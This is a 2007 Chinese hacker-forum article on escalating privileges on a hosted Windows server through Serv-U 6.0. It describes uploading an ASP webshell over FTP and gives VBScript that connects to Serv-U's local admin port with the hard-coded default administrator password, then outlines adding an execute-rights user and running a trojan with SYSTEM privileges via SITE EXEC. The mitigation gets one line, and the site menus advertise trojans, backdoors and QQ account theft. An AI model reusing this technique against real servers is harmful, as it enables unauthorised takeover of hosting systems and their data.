文章 | 入侵攻击 | 安全防御 | 操作系统 | 网站建设 | 网络编程 | 路由交换 | 灾难恢复 | 新闻资讯 | 安全公告
下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创发布 | 动画教程
论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 美女贴图 | 灌水无罪 | 在线服务 | 会员照片 | 网站首页
 当前位置:主页 >> 技术文摘 >> 入侵攻击 >> 文章内容  
 

 
Serv-U 6.0提权新招

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
 前几天,朋友买了一个收费的主页空间,把FTP账号和密码给了我,让我看看安全性如何。老规矩,先用X-Scan扫描,只开了80,21端口,用的是IIS5.0和Serv-U6.0,用FTP传个ASP木马上去,FSO开着,可是C、D、E、F没有权限,看都看不了。看来这个管理员是安全意识不错,在网站根目录传个自制木马上去,成功保存在d:\web\wwwroot\webss\muma.exe,可惜执行失败,在ASP木马上了看,原来是关了Wscript.shell权限。
看来别的地方是动不了了,只好试试Serv-U6.0提升权限了。问题也来了,臭要饭写的提升权限程序只能在本地提升权限,而我在服务器上有没有执行权,传上去也没有用,看来此路不通。
在服务器上转了几圈,没有发现什么可以利用漏洞,看来还是要靠Serv-U,在硬盘里找了找,远程溢出的程序全失败了……突然,我想到Serv-U6.0本地提权的本质是在本地连43958端口,那我是不是可以在WebShell里用MSWinsock.Winsock连接呢?只要用账户“localadministrator”,密码“#|@ak#.|k;0@p”就可以连上去了吧?于是我上网找了找,可惜没有发现这种代码,只好自己写了:
dimrevdata
dimsendata
setsock=createobject("MSWinsock.Winsock")
sock.Protocol=0(用TCP)
sock.Connect"127.0.0.1",43958
sendata="LocalAdministrator"&chr(10)&chr(13)
sock.senddatasendata
sendata="#|@ak#.|k;0@p"&chr(10)&chr(13)
sock.senddatasendata
使用这个代码就能连上FTP了,接下来用Sock.senddatasendata发送添加有执行权限用户的命令,然后想必大家也知道了,用有执行权限的用户连上,再用“SITEEXEC”执行命令,好了,木马启动了,有系统权限了。
其实,有时候,管理员一个小小的疏忽,就可以导致整个服务器被攻破,可见,安全是一个整体的重要性,这个看似坚固的服务器就这样一来破了。
至于修补的方法,黑防2005第一期就有,改掉localadministrator的密码就防护好了。
   -------------------------------------------------------------------------------------------
  上一篇:QQ秘笈:实现VPN服务器功能
  下一篇:动力任意文件删除漏洞曝光
   -------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
最新网吧免费上网方法
五招查出想要知道的IP地址
QQ技术攻略-原来隐藏着这
让星空极速彻底下岗,破解
网吧漏洞-自己加会员卡,丰
恶搞!如何将你的QQ性别改
黑客最起码要懂的16个问题
简单网站入侵(适合菜鸟)
我的黑客技术学习方法,仅
如何利用QQ邮件发木马
你会用Google?估计你会用
只需一行代码就能让IE 6崩
简单进网站后台(适合菜鸟)
10秒钟让你和任意QQ号聊天
Radmin密码破解新招
推荐:挖掘鸡使用教程
网上电影随意看 破解在线
菜鸟挖漏洞,黑站就是这么
找到肉鸡后如何做个好后门
电脑菜鸟必懂 常见木马连
一招就能搜尽所有QQ隐身好
2007.12 免费QQ秀
看清黑客穿透ADSL路由入侵
推荐:3389的密码嗅探
QQ号码被盗原因及案例分析
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2007 Www.Hx99.Net
版本:华西黑盟网站系统V5.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号